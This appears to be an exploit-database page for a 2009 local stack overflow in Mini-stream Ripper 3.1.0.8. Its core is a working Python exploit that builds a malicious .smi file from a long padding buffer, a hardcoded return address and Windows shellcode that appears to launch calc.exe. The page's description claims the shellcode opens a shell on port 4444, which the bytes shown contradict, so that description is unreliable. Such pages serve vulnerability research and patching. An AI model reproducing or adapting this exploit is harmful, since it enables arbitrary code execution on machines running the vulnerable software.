header-logo
Suggest Exploit
vendor:
Mini-stream Ripper
by:
Hazem Mofeed
7,2
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Mini-stream Ripper
Affected Version From: 3.1.0.8
Affected Version To: 3.1.0.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:mini-stream:mini-stream_ripper
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit

Mini-stream Ripper 3.1.0.8 is vulnerable to a local stack overflow vulnerability. By sending a specially crafted .smi file, an attacker can overwrite the return address of the stack and execute arbitrary code. The exploit code contains a shellcode that spawns a shell on port 4444.

Mitigation:

Upgrade to the latest version of Mini-stream Ripper.
Source

Exploit-DB raw data:

# Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
# Author: Hazem Mofeed
# Download: http://www.mini-stream.net/mini-stream-ripper/download/
# Home: http://hakxer.wordpress.com

# [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] --> Exploited ..
          # http://www.exploit-db.com/exploits/11607
shellcode = ("\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
   "\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
   "\x63\x2e\x65\x78\x65\x00") # SP3(sh)

# exploit
exploit = ("\x41" * 43496 +  "\x08\x6A\x83\x7C" + "\x08\x6A\x83\x7C" + shellcode )
file = open("exploit.smi","w")
file.write(exploit)
file.close()

Navigation

Suggest Exploit

Services By CQR